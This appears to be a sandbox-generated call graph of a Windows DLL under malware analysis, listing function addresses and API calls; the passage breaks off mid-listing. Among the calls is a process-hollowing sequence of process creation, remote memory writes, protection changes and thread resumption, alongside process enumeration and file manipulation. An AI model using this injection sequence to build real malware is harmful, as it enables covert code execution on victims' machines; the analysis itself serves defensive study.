11815 100013b4 11811->11815 11818 1000c08f 7 API calls 11811->11818 11814 10001391 11812->11814 11812->11815 12264 1001143c 11812->12264 12285 10001178 11814->12285 11815->11657 11819 10001369 11818->11819 12216 10002382 11819->12216 11833 10009192 11823->11833 11826 10009584 LoadLibraryA 11828 1000958b 11826->11828 11827 1000957c GetModuleHandleA 11827->11828 11829 10009599 11828->11829 11836 1000950e 11828->11836 11841 10009e14 11829->11841 11845 10009cbf 11833->11845 11837 100091e7 RtlAllocateHeap 11836->11837 11838 10009520 11837->11838 11839 1000954f 11838->11839 11851 100093b8 11838->11851 11839->11829 11842 10009e22 11841->11842 11843 100015e8 11841->11843 11844 10009203 2 API calls 11842->11844 11843->11676 11844->11843 11846 10009cd4 11845->11846 11847 10009ce9 GetNumberFormatA 11845->11847 11846->11847 11848 10009d17 11846->11848 11850 100091ad 11847->11850 11849 100091e7 RtlAllocateHeap 11848->11849 11849->11850 11850->11826 11850->11827 11852 1000942c 11851->11852 11853 100093d1 11851->11853 11852->11838 11853->11852 11854 10009484 LoadLibraryA 11853->11854 11854->11852 11855 10009492 GetProcAddress 11854->11855 11855->11852 11856 1000949e 11855->11856 11856->11852 11858 10009373 memset 11857->11858 11859 1000923d HeapFree 11857->11859 11858->11859 11859->11698 11861 1000dd2e 11860->11861 11862 1000dd32 11861->11862 11959 1000dd00 11861->11959 11862->11709 11865 1000dd43 11865->11709 11866 1000dd57 FindCloseChangeNotification 11866->11865 11971 1000dc3c GetCurrentThread OpenThreadToken 11867->11971 11870 1000de1d 11870->11708 11871 1000dc93 6 API calls 11875 1000dd9b FindCloseChangeNotification 11871->11875 11873 1000de13 11874 10009203 2 API calls 11873->11874 11874->11870 11875->11870 11875->11873 11878 1000e6a9 11876->11878 11877 1000bcfd 11880 1000e64f 11877->11880 11878->11877 11976 1000984f 11878->11976 11881 1000e666 11880->11881 11882 1000e686 11881->11882 11883 1000984f RtlAllocateHeap 11881->11883 11882->11714 11884 1000e673 11883->11884 11884->11714 11886 1000bb4f 11885->11886 11888 1000bb60 11886->11888 11980 1000ba2b GetCommandLineW CommandLineToArgvW 11886->11980 11888->11721 11989 1000d131 11889->11989 11891 1000bdba 11892 1000d001 11891->11892 11893 1000d01c 11892->11893 11894 10009192 2 API calls 11893->11894 11895 1000d026 11894->11895 12003 10014c3a 11895->12003 11897 1000d071 11898 10009e14 2 API calls 11897->11898 11900 1000bdd0 11898->11900 11899 1000d03b 11899->11897 11901 10014c3a 2 API calls 11899->11901 11902 10009971 11900->11902 11901->11899 11903 10009978 11902->11903 11904 1000997d MultiByteToWideChar 11902->11904 11903->11727 11905 10009991 11904->11905 11905->11727 11907 10009192 2 API calls 11906->11907 11908 1000d245 11907->11908 11909 10009192 2 API calls 11908->11909 11910 1000d256 11909->11910 11911 10014c3a 2 API calls 11910->11911 11912 1000d2af 11910->11912 11918 1000be0b 11910->11918 11911->11910 11913 10014c3a 2 API calls 11912->11913 11914 1000d2da 11912->11914 11913->11912 11915 10009e14 2 API calls 11914->11915 11916 1000d2e7 11915->11916 11917 10009e14 2 API calls 11916->11917 11917->11918 11919 1000dee4 11918->11919 11920 1000defc 11919->11920 11921 1000be1d 11920->11921 11922 1000dc93 6 API calls 11920->11922 11921->11732 11923 1000df14 11922->11923 11923->11921 11924 10009203 2 API calls 11923->11924 11924->11921 11926 1000b953 GetCurrentProcess IsWow64Process 11925->11926 11927 1000b964 11925->11927 11926->11927 11928 1000b967 11927->11928 11929 1000b971 11928->11929 11930 1000b976 GetSystemInfo 11928->11930 11929->11737 11930->11737 12008 10009d63 11931->12008 11935 1000bfb0 11934->11935 11936 10014aeb 11934->11936 11938 100096f3 11935->11938 11936->11935 11937 10014c3a 2 API calls 11936->11937 11937->11936 12014 1000967b 11938->12014 11941 1000b5e5 11945 1000b8ca 11941->11945 11942 10009192 2 API calls 11942->11945 11944 1000b8fd 12020 1000c800 CreateToolhelp32Snapshot 11944->12020 11945->11942 11945->11944 11947 10009e14 2 API calls 11945->11947 12033 10009ac5 11945->12033 11947->11945 11948 1000b919 11950 1000b936 11948->11950 12039 10009bbe 11948->12039 11950->11749 11952 1000bc1c 11951->11952 11953 1000bc2c 11952->11953 12048 1000bb68 GetCommandLineW CommandLineToArgvW 11952->12048 11953->11721 11956 1000936a memset 11955->11956 11957 1000c186 _vsnwprintf 11956->11957 11958 1000c1a3 11957->11958 11958->11743 11962 1000dc93 GetTokenInformation 11959->11962 11963 1000dcb5 GetLastError 11962->11963 11967 1000dcd2 11962->11967 11964 1000dcc0 11963->11964 11963->11967 11965 100091e7 RtlAllocateHeap 11964->11965 11966 1000dcc8 11965->11966 11966->11967 11968 1000dcd6 GetTokenInformation 11966->11968 11967->11865 11967->11866 11968->11967 11969 1000dceb 11968->11969 11970 10009203 2 API calls 11969->11970 11970->11967 11972 1000dc89 11971->11972 11973 1000dc5d GetLastError 11971->11973 11972->11870 11972->11871 11973->11972 11974 1000dc6a OpenProcessToken 11973->11974 11974->11972 11977 10009858 11976->11977 11979 1000986a 11976->11979 11978 100091e7 RtlAllocateHeap 11977->11978 11978->11979 11979->11877 11981 1000bb19 11980->11981 11986 1000ba61 11980->11986 11981->11888 11982 1000bab7 11982->11981 11983 1000bad9 GetCurrentDirectoryW 11982->11983 11985 100099ec 2 API calls 11983->11985 11984 1000ba85 lstrlenW 11984->11986 11987 1000bb00 11985->11987 11986->11982 11986->11984 11988 10009203 2 API calls 11987->11988 11988->11981 11990 1000936a memset 11989->11990 11991 1000d153 11990->11991 11992 100091b2 2 API calls 11991->11992 11993 1000d189 GetVolumeInformationW 11992->11993 11994 10009e2e 2 API calls 11993->11994 11995 1000d1be 11994->11995 11996 1000c172 2 API calls 11995->11996 11997 1000d1df lstrcatW 11996->11997 12001 1000cf22 11997->12001 12000 1000d205 12000->11891 12002 1000cf2a CharUpperBuffW 12001->12002 12002->12000 12004 10014c4a 12003->12004 12005 10014c7d lstrlenW 12004->12005 12006 10014c9a _ftol2_sse 12005->12006 12006->11899 12009 10009d9e GetNumberFormatA 12008->12009 12011 10009d7a 12008->12011 12010 10009dbe 12009->12010 12012 100091e7 RtlAllocateHeap 12010->12012 12011->12009 12013 100091cd 12012->12013 12013->11740 12015 1000968b 12014->12015 12015->12015 12016 10014c3a 2 API calls 12015->12016 12017 100096a6 12016->12017 12018 100096da 12017->12018 12019 10014c3a 2 API calls 12017->12019 12018->11941 12019->12017 12021 1000c859 12020->12021 12022 1000c82e 12020->12022 12021->11948 12023 1000936a memset 12022->12023 12024 1000c840 Process32First 12023->12024 12024->12021 12025 1000c867 12024->12025 12026 100091e7 RtlAllocateHeap 12025->12026 12027 1000c86e 12026->12027 12028 10009203 2 API calls 12027->12028 12029 1000c88d 12028->12029 12030 1000c8a1 Process32Next 12029->12030 12031 1000c8b4 FindCloseChangeNotification 12029->12031 12045 1000b56f 12029->12045 12030->12029 12030->12031 12031->12021 12035 10009ad9 12033->12035 12034 100091e7 RtlAllocateHeap 12038 10009b31 12034->12038 12035->12034 12036 10009ba8 12036->11945 12037 100091e7 RtlAllocateHeap 12037->12038 12038->12036 12038->12037 12042 10009c0a 12039->12042 12044 10009bcf 12039->12044 12040 10009c01 12041 10009203 2 API calls 12040->12041 12041->12042 12042->11948 12043 10009203 2 API calls 12043->12044 12044->12040 12044->12042 12044->12043 12046 1000b5d1 Sleep 12045->12046 12047 1000b580 12045->12047 12046->12029 12047->12046 12049 1000bb94 12048->12049 12050 1000bbe9 12048->12050 12049->12050 12051 1000bba9 GetCurrentDirectoryW 12049->12051 12050->11953 12052 100099ec 2 API calls 12051->12052 12053 1000bbd1 12052->12053 12054 10009203 2 API calls 12053->12054 12054->12050 12056 1000a66c 12055->12056 12057 100091e7 RtlAllocateHeap 12056->12057 12061 1000a703 12057->12061 12058 100091b2 2 API calls 12058->12061 12059 1000a760 12059->11755 12059->11757 12060 10009e2e 2 API calls 12060->12061 12061->12058 12061->12059 12061->12060 12062 1000984f RtlAllocateHeap 12061->12062 12062->12061 12064 1000a43b 12063->12064 12065 1000a42f 12063->12065 12064->11770 12109 1000a2ea 12065->12109 12069 1000936a memset 12068->12069 12070 1000cb8e 12069->12070 12071 1000936a memset 12070->12071 12072 1000cb9b CreateProcessW 12071->12072 12072->11770 12132 1000a51f 12073->12132 12076 1000aa0c 12076->11770 12077 1000936a memset 12078 1000a975 GetThreadContext 12077->12078 12078->12076 12079 1000a99b 12078->12079 12079->12076 12080 1000a9ce NtProtectVirtualMemory NtWriteVirtualMemory 12079->12080 12080->12076 12081 1000aa15 NtProtectVirtualMemory 12080->12081 12081->12076 12167 1000c08f 12082->12167 12085 1000aa73 GetLastError NtResumeThread 12087 1000aa93 FindCloseChangeNotification 12085->12087 12086 1000aaa6 12086->11770 12087->12086 12090 100091b2 2 API calls 12089->12090 12091 1000e24f 12090->12091 12092 100091b2 2 API calls 12091->12092 12093 1000e260 12092->12093 12094 1000c172 2 API calls 12093->12094 12095 1000e298 12094->12095 12096 100099ec 2 API calls 12095->12096 12097 1000e2b3 12096->12097 12098 1000e2e9 12097->12098 12101 1000e2fb 12097->12101 12100 10009e2e 2 API calls 12098->12100 12099 10009e2e 2 API calls 12102 1000e2f2 12099->12102 12100->12102 12101->12099 12102->11770 12104 1000a45e FreeLibrary 12103->12104 12106 1000a478 12103->12106 12105 10009203 2 API calls 12104->12105 12105->12106 12107 10009203 2 API calls 12106->12107 12108 1000a49b 12106->12108 12107->12108 12108->11762 12110 100091b2 2 API calls 12109->12110 12111 1000a302 12110->12111 12112 1000c172 2 API calls 12111->12112 12113 1000a339 12112->12113 12114 100091b2 2 API calls 12113->12114 12115 1000a358 12114->12115 12116 100099ec 2 API calls 12115->12116 12117 1000a372 12116->12117 12118 10009e2e 2 API calls 12117->12118 12119 1000a380 12118->12119 12120 100099ec 2 API calls 12119->12120 12121 1000a3a3 LoadLibraryW 12120->12121 12123 1000a3c6 12121->12123 12124 1000a3d4 12121->12124 12125 1000950e 3 API calls 12123->12125 12126 10009203 2 API calls 12124->12126 12125->12124 12127 1000a3e2 12126->12127 12128 1000936a memset 12127->12128 12129 1000a3f5 12128->12129 12130 1000a407 12129->12130 12131 10009203 2 API calls 12129->12131 12130->12064 12131->12130 12133 1000a53d NtAllocateVirtualMemory 12132->12133 12151 1000a5af 12132->12151 12134 1000a560 12133->12134 12133->12151 12152 10009252 12134->12152 12136 1000a570 12136->12151 12155 1000caf3 NtAllocateVirtualMemory 12136->12155 12139 1000a5b8 12142 10009203 2 API calls 12139->12142 12140 1000a5aa 12141 10009203 2 API calls 12140->12141 12141->12151 12143 1000a5bd 12142->12143 12144 10009252 RtlAllocateHeap 12143->12144 12145 1000a5e6 12144->12145 12146 1000a5fb NtWriteVirtualMemory 12145->12146 12145->12151 12147 1000a62a 12146->12147 12146->12151 12159 100144d8 12147->12159 12150 10009203 2 API calls 12150->12151 12151->12076 12151->12077 12153 100091e7 RtlAllocateHeap 12152->12153 12154 10009263 12153->12154 12154->12136 12156 1000a597 12155->12156 12157 1000cb28 NtWriteVirtualMemory 12155->12157 12156->12139 12156->12140 12157->12156 12158 1000cb3b NtProtectVirtualMemory 12157->12158 12158->12156 12160 100144f0 NtProtectVirtualMemory 12159->12160 12162 1000a63a 12159->12162 12160->12162 12163 1001456f 12160->12163 12162->12150 12163->12162 12164 1000936a memset 12163->12164 12166 100145a9 12164->12166 12165 100146e4 NtProtectVirtualMemory 12165->12162 12166->12165 12168 1000c0a8 12167->12168 12171 1000bfdc 12168->12171 12172 10014ae0 2 API calls 12171->12172 12173 1000bff4 12172->12173 12174 10009192 2 API calls 12173->12174 12175 1000c01e 12174->12175 12180 1000c133 12175->12180 12177 1000c07c 12178 10009e14 2 API calls 12177->12178 12179 1000aa59 12178->12179 12179->12085 12179->12086 12181 1000936a memset 12180->12181 12182 1000c147 _vsnprintf 12181->12182 12183 1000c161 12182->12183 12183->12177 12289 1000ab0b 12184->12289 12187 100114f8 12188 100091e7 RtlAllocateHeap 12187->12188 12189 10011503 12188->12189 12190 1001150d 12189->12190 12350 1000e841 12189->12350 12190->11804 12193 10011564 12195 10011589 12193->12195 12360 1000ea03 12193->12360 12194 10009192 2 API calls 12196 10011547 12194->12196 12195->11804 12356 1000980b 12196->12356 12200 10011552 12202 10009e14 2 API calls 12200->12202 12201 1001143c 14 API calls 12203 10011585 12201->12203 12202->12193 12203->11804 12368 1000aecb 12204->12368 12207 1000140b 12208 1000c08f 7 API calls 12207->12208 12209 10001428 12208->12209 12210 10002382 10 API calls 12209->12210 12215 1000133a 12209->12215 12211 10001462 12210->12211 12211->12215 12397 1000aeb1 12211->12397 12214 10001474 lstrcmpiW 12214->12215 12215->11809 12215->11810 12217 1000c08f 7 API calls 12216->12217 12218 1000239b 12217->12218 12219 100023a8 12218->12219 12220 10009999 2 API calls 12218->12220 12221 100023cb 12220->12221 12401 1000e96e 12221->12401 12223 100023db 12226 1000e96e 2 API calls 12223->12226 12227 100023ff 12223->12227 12224 10009203 2 API calls 12225 10001387 12224->12225 12228 1000129c 12225->12228 12226->12227 12227->12224 12229 1000aeb1 4 API calls 12228->12229 12230 100012a6 12229->12230 12231 100012b4 lstrcmpiW 12230->12231 12232 100012af 12230->12232 12233 100012e6 12231->12233 12234 100012ca 12231->12234 12232->11814 12236 10009203 2 API calls 12233->12236 12406 1000afa9 12234->12406 12236->12232 12240 100091e7 RtlAllocateHeap 12239->12240 12241 100011a4 12240->12241 12242 100011b7 GetDriveTypeW 12241->12242 12243 100011e8 12241->12243 12242->12243 12454 10002885 12243->12454 12246 100091b2 2 API calls 12247 10001211 12246->12247 12248 100099ec 2 API calls 12247->12248 12249 10001226 12248->12249 12250 10009e2e 2 API calls 12249->12250 12251 10001232 12250->12251 12252 10001249 12251->12252 12473 1000b496 12251->12473 12254 10009203 2 API calls 12252->12254 12255 1000125d 12254->12255 12257 10001276 12255->12257 12486 1000278b 12255->12486 12258 1000127a 12257->12258 12491 10001d6a 12257->12491 12531 1000b4af 12258->12531 12262 1000b4af 2 API calls 12263 10001295 12262->12263 12263->11812 12265 100091b2 2 API calls 12264->12265 12266 1001144b 12265->12266 12967 1000cd53 memset 12266->12967 12269 10009e2e 2 API calls 12270 10011471 12269->12270 12284 100114ea 12270->12284 12979 1000ae47 12270->12979 12273 100091e7 RtlAllocateHeap 12274 1001149c 12273->12274 12275 100016ec 2 API calls 12274->12275 12274->12284 12276 100114ae 12275->12276 12277 1000c172 2 API calls 12276->12277 12278 100114bd 12277->12278 12279 1000c493 2 API calls 12278->12279 12280 100114d0 12279->12280 12283 100114de 12280->12283 12982 1000b2b1 12280->12982 12282 10009203 2 API calls 12282->12284 12283->12282 12284->11814 12286 1000118a 12285->12286 12993 1000224b 12286->12993 12290 100091e7 RtlAllocateHeap 12289->12290 12291 1000ab35 12290->12291 12316 10001322 12291->12316 12328 1000cf78 12291->12328 12294 10009192 2 API calls 12295 1000ab75 12294->12295 12296 1000acb4 12295->12296 12301 1000aba2 12295->12301 12297 1000ad05 12296->12297 12298 1000acc6 12296->12298 12299 10009999 2 API calls 12297->12299 12300 1000acb0 12298->12300 12302 10009999 2 API calls 12298->12302 12299->12300 12303 10009e14 2 API calls 12300->12303 12301->12300 12338 10009999 12301->12338 12302->12300 12306 1000ad26 12303->12306 12305 10009203 2 API calls 12307 1000adbd 12305->12307 12306->12305 12319 1000ad82 12306->12319 12309 1000936a memset 12307->12309 12309->12319 12310 100091b2 2 API calls 12311 1000ac08 12310->12311 12312 100099ec 2 API calls 12311->12312 12315 1000ac1a 12312->12315 12313 10009203 2 API calls 12313->12316 12314 10009999 2 API calls 12317 1000ac91 12314->12317 12318 10009e2e 2 API calls 12315->12318 12316->11802 12316->12187 12322 10009203 2 API calls 12317->12322 12320 1000ac28 12318->12320 12319->12313 12344 100098c2 12320->12344 12322->12300 12324 10009203 2 API calls 12325 1000ac5f 12324->12325 12326 10009203 2 API calls 12325->12326 12327 1000ac6a 12326->12327 12327->12314 12329 1000cf91 12328->12329 12330 10014c3a 2 API calls 12329->12330 12331 1000cfa1 12330->12331 12332 10009192 2 API calls 12331->12332 12333 1000cfb0 12332->12333 12334 1000cfec 12333->12334 12337 10014c3a 2 API calls 12333->12337 12335 10009e14 2 API calls 12334->12335 12336 1000ab56 12335->12336 12336->12294 12337->12333 12340 100099ab 12338->12340 12339 100091e7 RtlAllocateHeap 12341 100099c8 12339->12341 12340->12339 12342 100099e5 12341->12342 12343 100099d4 lstrcatA 12341->12343 12342->12306 12342->12310 12342->12327 12343->12341 12345 100098f8 12344->12345 12346 100098cb 12344->12346 12345->12324 12347 100091e7 RtlAllocateHeap 12346->12347 12348 100098dd 12347->12348 12348->12345 12349 100098e5 MultiByteToWideChar 12348->12349 12349->12345 12351 1000e859 12350->12351 12352 1000e852 12350->12352 12351->12352 12353 1000e883 12351->12353 12354 100091e7 RtlAllocateHeap 12351->12354 12352->12193 12352->12194 12353->12352 12355 10009203 2 API calls 12353->12355 12354->12353 12355->12352 12357 10009816 12356->12357 12359 10009831 12356->12359 12358 100091e7 RtlAllocateHeap 12357->12358 12358->12359 12359->12200 12361 1000ea27 12360->12361 12364 10010e35 12361->12364 12366 10010e4e 12364->12366 12365 10010e6f lstrlenW 12367 1000ea39 12365->12367 12366->12365 12366->12366 12367->12201 12371 1000aedb 12368->12371 12376 1000affb 12371->12376 12374 10001335 12374->12207 12375 10009203 2 API calls 12375->12374 12377 1000b01d 12376->12377 12390 1000aaab 12377->12390 12379 1000aef4 12379->12374 12379->12375 12380 1000b027 12380->12379 12393 100100ae 12380->12393 12382 1000b0f4 12383 10009203 2 API calls 12382->12383 12383->12379 12384 1000b05b 12384->12382 12385 10010e35 lstrlenW 12384->12385 12386 1000b0ac 12385->12386 12387 1000b0cf 12386->12387 12389 10009252 RtlAllocateHeap 12386->12389 12388 10009203 2 API calls 12387->12388 12388->12382 12389->12387 12391 100091e7 RtlAllocateHeap 12390->12391 12392 1000aab7 12391->12392 12392->12380 12394 100100d4 12393->12394 12395 100091e7 RtlAllocateHeap 12394->12395 12396 100100d8 12394->12396 12395->12396 12396->12384 12398 1000aeb6 12397->12398 12399 1000affb 4 API calls 12398->12399 12400 10001470 12399->12400 12400->12214 12400->12215 12402 1000e978 12401->12402 12403 1000e97d 12401->12403 12402->12223 12404 1000e994 GetLastError 12403->12404 12405 1000e99f GetLastError 12403->12405 12404->12402 12405->12402 12422 1000afb7 12406->12422 12409 1000a14f SetFileAttributesW 12410 1000936a memset 12409->12410 12411 1000a17c 12410->12411 12412 10014c3a 2 API calls 12411->12412 12418 1000a19d 12411->12418 12413 1000a1b9 12412->12413 12414 1000c172 2 API calls 12413->12414 12415 1000a1ca 12414->12415 12416 100099ec 2 API calls 12415->12416 12417 1000a1db 12416->12417 12417->12418 12442 1000a07c 12417->12442 12418->12233 12421 10009203 2 API calls 12421->12418 12423 1000afc7 12422->12423 12426 1000b128 12423->12426 12427 1000b145 12426->12427 12439 100012db 12426->12439 12428 10014c3a 2 API calls 12427->12428 12427->12439 12429 1000b189 12428->12429 12430 100091e7 RtlAllocateHeap 12429->12430 12431 1000b19d 12430->12431 12432 10014ae0 2 API calls 12431->12432 12431->12439 12433 1000b1df 12432->12433 12434 10010e35 lstrlenW 12433->12434 12435 1000b220 12434->12435 12436 1000aaab RtlAllocateHeap 12435->12436 12440 1000b22c 12436->12440 12437 1000b296 12438 10009203 2 API calls 12437->12438 12438->12439 12439->12233 12439->12409 12440->12437 12441 10009203 2 API calls 12440->12441 12441->12437 12443 1000a09f 12442->12443 12444 1000a0a7 memset 12443->12444 12453 1000a116 12443->12453 12445 100091b2 2 API calls 12444->12445 12446 1000a0c3 12445->12446 12447 10014c3a 2 API calls 12446->12447 12448 1000a0df 12447->12448 12449 1000c172 2 API calls 12448->12449 12450 1000a0f5 12449->12450 12451 10009e2e 2 API calls 12450->12451 12452 1000a0fe MoveFileW 12451->12452 12452->12453 12453->12421 12539 100016d2 12454->12539 12459 10009e14 2 API calls 12460 100028c2 12459->12460 12461 100016d2 2 API calls 12460->12461 12472 10001205 12460->12472 12462 100028d1 12461->12462 12552 1000f949 12462->12552 12465 10009e14 2 API calls 12466 100028ee 12465->12466 12466->12472 12560 1000b480 12466->12560 12468 1000290b 12573 1000fcfb 12468->12573 12471 10009203 2 API calls 12471->12472 12472->12246 12645 1000f9a8 12473->12645 12475 1000b3be 12476 1000b4a7 12475->12476 12477 1000facb 3 API calls 12475->12477 12476->12252 12478 1000b3d1 12477->12478 12479 100091e7 RtlAllocateHeap 12478->12479 12483 1000b3d8 12479->12483 12480 1000b471 12481 1000fcfb 6 API calls 12480->12481 12482 1000b479 12481->12482 12482->12252 12483->12480 12483->12482 12484 10009281 3 API calls 12483->12484 12485 1000980b RtlAllocateHeap 12483->12485 12484->12483 12485->12483 12490 100027ff 12486->12490 12487 1000287e 12487->12257 12488 100091e7 RtlAllocateHeap 12488->12490 12489 10009203 2 API calls 12489->12490 12490->12487 12490->12488 12490->12489 12492 1000d214 8 API calls 12491->12492 12493 10001d82 12492->12493 12494 1000c08f 7 API calls 12493->12494 12495 10001d8e 12494->12495 12664 1000e920 12495->12664 12497 10001d9a 12498 10009559 8 API calls 12497->12498 12523 10001da3 12497->12523 12499 10001dbd 12498->12499 12669 10001b39 memset 12499->12669 12502 1000936a memset 12504 10001e1c 12502->12504 12503 10001f7c 12505 100091b2 2 API calls 12503->12505 12711 1000e605 12504->12711 12506 10001f86 12505->12506 12508 100099ec 2 API calls 12506->12508 12512 10001f9d 12508->12512 12509 10001fcd 12511 10009e2e 2 API calls 12509->12511 12516 10001fd9 12511->12516 12512->12509 12514 10009203 2 API calls 12512->12514 12513 10001e9e 12515 100091e7 RtlAllocateHeap 12513->12515 12514->12509 12517 10001efa 12515->12517 12518 10009203 2 API calls 12516->12518 12520 100091b2 2 API calls 12517->12520 12517->12523 12519 10002034 12518->12519 12521 10009203 2 API calls 12519->12521 12522 10001f13 12520->12522 12521->12523 12524 1000c172 2 API calls 12522->12524 12523->12258 12525 10001f48 12524->12525 12526 10009e2e 2 API calls 12525->12526 12527 10001f52 12526->12527 12716 1000c493 12527->12716 12530 10009203 2 API calls 12530->12523 12532 1000b4be 12531->12532 12538 1000128d 12531->12538 12533 1000b4e3 12532->12533 12534 10009203 2 API calls 12532->12534 12535 10009203 2 API calls 12533->12535 12534->12532 12536 1000b4ee 12535->12536 12537 10009203 2 API calls 12536->12537 12537->12538 12538->12262 12540 10009cbf 2 API calls 12539->12540 12541 100016e8 12540->12541 12542 1000ffae 12541->12542 12543 100098c2 2 API calls 12542->12543 12548 1000ffd8 12543->12548 12544 10010035 12547 10009203 2 API calls 12544->12547 12545 10014c3a 2 API calls 12546 1000fffd FindResourceW 12545->12546 12546->12544 12546->12548 12550 10010065 12547->12550 12548->12544 12548->12545 12549 100028b1 12549->12459 12550->12549 12551 10009252 RtlAllocateHeap 12550->12551 12551->12549 12553 100028e0 12552->12553 12554 1000f958 12552->12554 12553->12465 12555 100091e7 RtlAllocateHeap 12554->12555 12556 1000f962 12555->12556 12556->12553 12585 1000f84e 12556->12585 12559 10009203 2 API calls 12559->12553 12561 1000f949 4 API calls 12560->12561 12562 1000b3be 12561->12562 12563 1000b48e 12562->12563 12623 1000facb 12562->12623 12563->12468 12566 100091e7 RtlAllocateHeap 12570 1000b3d8 12566->12570 12567 1000b479 12567->12468 12568 1000b471 12569 1000fcfb 6 API calls 12568->12569 12569->12567 12570->12567 12570->12568 12571 10009281 3 API calls 12570->12571 12572 1000980b RtlAllocateHeap 12570->12572 12571->12570 12572->12570 12574 1000fd0a 12573->12574 12575 10002916 12573->12575 12574->12575 12576 1000fd44 12574->12576 12578 10009203 2 API calls 12574->12578 12575->12471 12577 1000fd54 12576->12577 12628 1000fe22 12576->12628 12580 1000fd6f 12577->12580 12582 10009203 2 API calls 12577->12582 12578->12574 12581 1000fd85 12580->12581 12583 10009203 2 API calls 12580->12583 12584 10009203 2 API calls 12581->12584 12582->12580 12583->12581 12584->12575 12586 100091e7 RtlAllocateHeap 12585->12586 12587 1000f863 12586->12587 12590 1000f88b 12587->12590 12598 1000f870 12587->12598 12599 1000fda1 12587->12599 12588 1000f90f 12591 10009203 2 API calls 12588->12591 12588->12598 12590->12588 12592 1000f8d9 12590->12592 12593 1000fda1 lstrlenW 12590->12593 12591->12598 12592->12588 12592->12598 12603 1001074c 12592->12603 12593->12592 12596 1000f929 12597 10009203 2 API calls 12596->12597 12597->12598 12598->12553 12598->12559 12600 1000fdc1 12599->12600 12601 10010e35 lstrlenW 12600->12601 12602 1000fde5 12601->12602 12602->12590 12604 100091e7 RtlAllocateHeap 12603->12604 12605 10010770 12604->12605 12608 100091e7 RtlAllocateHeap 12605->12608 12615 100108df 12605->12615 12606 10009203 2 API calls 12607 10010905 12606->12607 12609 10009203 2 API calls 12607->12609 12610 10010790 12608->12610 12611 10010913 12609->12611 12613 100091e7 RtlAllocateHeap 12610->12613 12610->12615 12612 1000f908 12611->12612 12614 10009203 2 API calls 12611->12614 12612->12588 12612->12596 12616 100107a4 12613->12616 12614->12612 12615->12606 12616->12615 12618 10009281 12616->12618 12619 100091e7 RtlAllocateHeap 12618->12619 12621 10009296 12619->12621 12620 100092be 12620->12616 12621->12620 12622 10009203 2 API calls 12621->12622 12622->12620 12626 1000faee 12623->12626 12624 100091e7 RtlAllocateHeap 12624->12626 12625 1000b3d1 12625->12566 12626->12624 12626->12625 12627 10009203 2 API calls 12626->12627 12627->12626 12629 100091e7 RtlAllocateHeap 12628->12629 12630 1000fe5b 12629->12630 12631 1000fe8e 12630->12631 12634 1000ff0c 12630->12634 12639 1000fe65 12630->12639 12640 1000f7d4 12631->12640 12633 1000fe9a 12636 10010e35 lstrlenW 12633->12636 12635 10010e35 lstrlenW 12634->12635 12638 1000ff04 12635->12638 12636->12638 12637 10009203 2 API calls 12637->12639 12638->12637 12639->12577 12641 10014c3a 2 API calls 12640->12641 12642 1000f7ed 12641->12642 12643 1000f81a 12642->12643 12644 10014c3a 2 API calls 12642->12644 12643->12633 12644->12642 12646 100091e7 RtlAllocateHeap 12645->12646 12647 1000f9c9 12646->12647 12648 1000fa01 12647->12648 12649 1000fa4f 12647->12649 12654 1000f9d3 12647->12654 12650 1000e841 3 API calls 12648->12650 12651 100091e7 RtlAllocateHeap 12649->12651 12653 1000fa0b 12650->12653 12652 1000fa5a 12651->12652 12652->12654 12655 1000fa74 12652->12655 12657 10009203 2 API calls 12652->12657 12653->12655 12656 1000f84e 4 API calls 12653->12656 12654->12475 12659 1000fa9c 12655->12659 12661 10009203 2 API calls 12655->12661 12658 1000fa25 12656->12658 12657->12655 12658->12652 12660 1000fa2b 12658->12660 12662 10009203 2 API calls 12659->12662 12663 10009203 2 API calls 12660->12663 12661->12659 12662->12654 12663->12654 12665 1000e934 12664->12665 12666 1000e944 GetLastError 12665->12666 12667 1000e93a GetLastError 12665->12667 12668 1000e951 12666->12668 12667->12668 12668->12497 12671 10001b6c 12669->12671 12670 10001b9f 12673 1000d214 8 API calls 12670->12673 12710 10001bd3 12670->12710 12671->12670 12723 10002aec 12671->12723 12674 10001bb1 12673->12674 12675 1000d001 6 API calls 12674->12675 12676 10001bc1 12675->12676 12677 10001bcf 12676->12677 12739 10001ad7 12676->12739 12677->12710 12747 10001a7a 12677->12747 12680 10001be4 12681 1000d22a 6 API calls 12680->12681 12682 10001c0c 12681->12682 12758 10002bd3 12682->12758 12685 100099ec 2 API calls 12686 10001c3a 12685->12686 12687 10001c5c 12686->12687 12689 1000984f RtlAllocateHeap 12686->12689 12688 1000ab0b 10 API calls 12687->12688 12690 10001c7b 12688->12690 12691 10001c4e 12689->12691 12690->12710 12792 1000af7e 12690->12792 12692 1000984f RtlAllocateHeap 12691->12692 12692->12687 12695 1000afb7 6 API calls 12696 10001ca4 12695->12696 12796 1000af59 12696->12796 12699 10001cc6 12701 10001cd7 12699->12701 12702 1000b4fe 7 API calls 12699->12702 12806 1000c3b5 GetSystemTimeAsFileTime 12701->12806 12702->12701 12704 10001cde 12808 1000af2b 12704->12808 12708 10001d06 12708->12710 12823 1000cbc8 12708->12823 12710->12502 12710->12503 12963 1000e512 12711->12963 12714 1000e512 RtlAllocateHeap 12715 10001e4d 12714->12715 12715->12503 12715->12513 12717 1000936a memset 12716->12717 12718 1000c4ab 12717->12718 12719 1000936a memset 12718->12719 12720 1000c4b7 12719->12720 12721 10001f66 12720->12721 12722 1000c50e GetExitCodeProcess 12720->12722 12721->12530 12722->12721 12724 10002b08 12723->12724 12725 10002ba0 12724->12725 12726 100016ec 2 API calls 12724->12726 12725->12670 12727 10002b18 12726->12727 12728 100099ec 2 API calls 12727->12728 12729 10002b2a 12728->12729 12730 10009e2e 2 API calls 12729->12730 12731 10002b35 12730->12731 12732 100016ec 2 API calls 12731->12732 12733 10002b3f 12732->12733 12857 1001014a 12733->12857 12736 10009e2e 2 API calls 12737 10002b5b 12736->12737 12738 10009203 2 API calls 12737->12738 12738->12725 12740 1000d214 8 API calls 12739->12740 12741 10001ae0 12740->12741 12863 1000e42c 12741->12863 12743 10001aee 12743->12677 12745 10009203 2 API calls 12746 10001b32 12745->12746 12746->12677 12748 100098c2 2 API calls 12747->12748 12749 10001a85 12748->12749 12750 100091b2 2 API calls 12749->12750 12751 10001aad 12750->12751 12752 100099ec 2 API calls 12751->12752 12753 10001ab9 12752->12753 12754 10009e2e 2 API calls 12753->12754 12755 10001ac4 12754->12755 12756 10009203 2 API calls 12755->12756 12757 10001acf 12756->12757 12757->12680 12872 1000d086 12758->12872 12760 10002bec 12761 10002bf8 12760->12761 12762 10002c6d 12760->12762 12763 100016ec 2 API calls 12761->12763 12764 10002aec 5 API calls 12762->12764 12765 10002c02 